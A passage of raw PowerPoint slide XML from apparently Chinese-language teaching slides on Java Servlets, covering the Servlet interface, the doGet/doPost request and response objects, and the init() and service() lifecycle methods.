                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>sun</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>公司开发动态</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>的一门技术</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                    <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="874395" lvl="2" indent="-342900">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="+mj-lt"/>
                  <a:buAutoNum type="arabicPeriod"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>Sun</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>提供一个接口叫做：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>Servlet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>，</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>如果你想开发一个</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>Servlet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>程序，只需要完成两个小步骤。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="1331595" lvl="3" indent="-342900">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="+mj-ea"/>
                  <a:buAutoNum type="circleNumDbPlain"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>编写一个类，实现</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>Servlet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>接口</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="1331595" lvl="3" indent="-342900">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="+mj-ea"/>
                  <a:buAutoNum type="circleNumDbPlain"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>把开发好</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>Java</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>类部署到</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                  </a:rPr>
                  <a:t>服务器中</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="1274445" lvl="3" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="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0" name="矩形: 对角圆角 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920211" y="1823316"/>
                <a:ext cx="1365127" cy="430580"/>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Servlet</a:t>
                </a:r>
                <a:endPar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38" name="Shape 2621"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943694" y="1721922"/>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gr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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="337055" y="1123006"/>
            <a:ext cx="10167115" cy="1985955"/>
            <a:chOff x="850497" y="1502290"/>
            <a:chExt cx="9554080" cy="1262092"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="850497" y="1502290"/>
              <a:ext cx="9554080" cy="1262092"/>
              <a:chOff x="920209" y="1679144"/>
              <a:chExt cx="9368517" cy="1262092"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="矩形: 对角圆角 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1679145"/>
                <a:ext cx="9368517" cy="1262091"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 4460"/>
                  <a:gd name="adj2" fmla="val 5241"/>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360000" bIns="36000" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="ü"/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="矩形: 对角圆角 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1679144"/>
                <a:ext cx="1662541" cy="355474"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 30835"/>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工作流程</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4" name="Shape 2375"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1049032" y="1616556"/>
              <a:ext cx="234217" cy="139729"/>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bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:noFill/>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solidFill>
                  <a:srgbClr val="F4B246"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337055" y="1702479"/>
            <a:ext cx="10475726" cy="1319592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="360045" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>doGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>doPost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>方法的参数都是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>HttpServletRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>HttpServletResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="360045" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>HttpServletRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>对象代表了客户端的请求，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>servlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>通过这个对象获得客户端的请求数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi R"/>
              <a:cs typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="360045" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>HttpServletResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>对象代表了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>对客户端请求的响应，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>sevlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>用这个对象向客户端返回数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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7574" y="3288761"/>
            <a:ext cx="8288089" cy="2930892"/>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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="280415" y="1258129"/>
            <a:ext cx="11631167" cy="5244267"/>
            <a:chOff x="850497" y="1502290"/>
            <a:chExt cx="10929856" cy="3332779"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="850497" y="1502290"/>
              <a:ext cx="10929856" cy="3332779"/>
              <a:chOff x="920209" y="1679144"/>
              <a:chExt cx="10717572" cy="3332779"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="矩形: 对角圆角 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1679144"/>
                <a:ext cx="10717572" cy="3332779"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 4460"/>
                  <a:gd name="adj2" fmla="val 5241"/>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360000" bIns="36000" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Init</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="ü"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>在生命周期中，仅执行一次</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>init</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>()</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>方法</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="ü"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>用于服务器装入</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Servlet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>时执行的，负责初始化</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Servlet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>对象</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Service</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="ü"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>执行实际任务的主要方法</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="ü"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Servlet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>容器（即 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>服务器）调用 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>service() </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>方法来处理来自客户端（浏览器）的请求，并把格式化的响应写回给客户端。</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="ü"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
